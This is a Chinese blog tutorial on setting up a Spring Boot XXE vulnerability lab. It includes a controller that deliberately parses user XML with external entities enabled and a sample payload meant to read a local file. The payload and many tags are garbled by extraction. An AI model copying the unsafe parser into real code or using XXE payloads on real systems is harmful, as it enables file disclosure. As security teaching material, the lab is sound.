前言:
继上一篇博客,本篇博客记录下XXE漏洞靶场的搭建过程及关键代码。
2、项目配置
编写 application.properties
spring.thymeleaf.prefix = classpath:/templates/
pom.xml 导入相关依赖
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0modelVersion>
<parent>
<groupId>org.springframework.bootgroupId>
<artifactId>spring-boot-starter-parentartifactId>
<version>2.6.4version>
<relativePath/>
parent>
<groupId>com.examplegroupId>
<artifactId>XXE_springbootartifactId>
<version>0.0.1-SNAPSHOTversion>
<name>XXE_springbootname>
<description>XXE_springbootdescription>
<properties>
<java.version>1.8java.version>
properties>
<dependencies>
<dependency>
<groupId>org.springframework.bootgroupId>
<artifactId>spring-boot-starter-webartifactId>
dependency>
<dependency>
<groupId>org.springframework.bootgroupId>
<artifactId>spring-boot-starter-testartifactId>
<scope>testscope>
dependency>
<dependency>
<groupId>org.springframework.bootgroupId>
<artifactId>spring-boot-starter-thymeleafartifactId>
dependency>
dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.bootgroupId>
<artifactId>spring-boot-maven-pluginartifactId>
plugin>
plugins>
build>
project>
3、编写“XXE漏洞”后端代码
indexController.java:用于匹配 index 首界面,匹配到 index.html
package com.example.xxe_springboot.controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
@Controller
public class indexController {
@RequestMapping(value={"/","/index.html"})
public String index(){
return "index";
}
}
index.html 中提交的数据,请求到 localhost:8080/xxe ,编写匹配 xxe 请求的 controller
XxeController.java
package com.example.xxe_springboot.controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
@RestController
public class XxeController {
@RequestMapping("/xxe")
public String xxe(@RequestParam(value = "xxe",required = false) String xxe) throws ParserConfigurationException, IOException, SAXException {
/**
*创建DOM解释器解析XML文件
*/
// 把要解析的 XML 文档转化为输入流,以便 DOM 解析器解析它
String anyString = xxe;
InputStream is = new ByteArrayInputStream(anyString.getBytes(StandardCharsets.UTF_8));
//InputStream is = new FileInputStream("D:\note2.xml");
//创建DOM模式的解析器工厂
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
//调用工厂的方法得到DOM解析器对象
DocumentBuilder builder = factory.newDocumentBuilder();
//调用 DOM 解析器对象的 parse() 方法解析 XML 文档,得到代表整个文档的 Document 对象
Document doc = builder.parse(is);
//根据元素名称获取元素值
NodeList nodeList = doc.getElementsByTagName("from");
System.out.println(nodeList.item(0).getTextContent());
return "success";
}
}
成功解析后返回到前端界面“success”,控制台输出读取文件内容,用于测试。
4、编写“XXE漏洞”前端代码
首先在主界面编写一个输入框,用于输入 payload,如果想构造其他场景也是可以的,例如登录界面等场景,但是我这里为了测试,就简单写了一个输入框,毕竟目的不是写一个前端,关键在于后端实现,漏洞场景的复现。
index.html
DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>XXEtitle>
head>
<body>
<p>这是一个XXE漏洞环境,试着构造payload读取D://XXE.txtp>
<form action="http://localhost:8080/xxe" method="get">
payload: <input type="text" name="xxe" />
<input type="submit" value="go" />
form>
body>
html>
5、运行测试
启动项目:
访问主界面:
payload:
DOCTYPE note [
]>
<note>
<to>Toveto>
<from>&myentity;from>
<heading>Reminderheading>
<body>Don't forget me this weekendbody>
note>
返回结果:
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)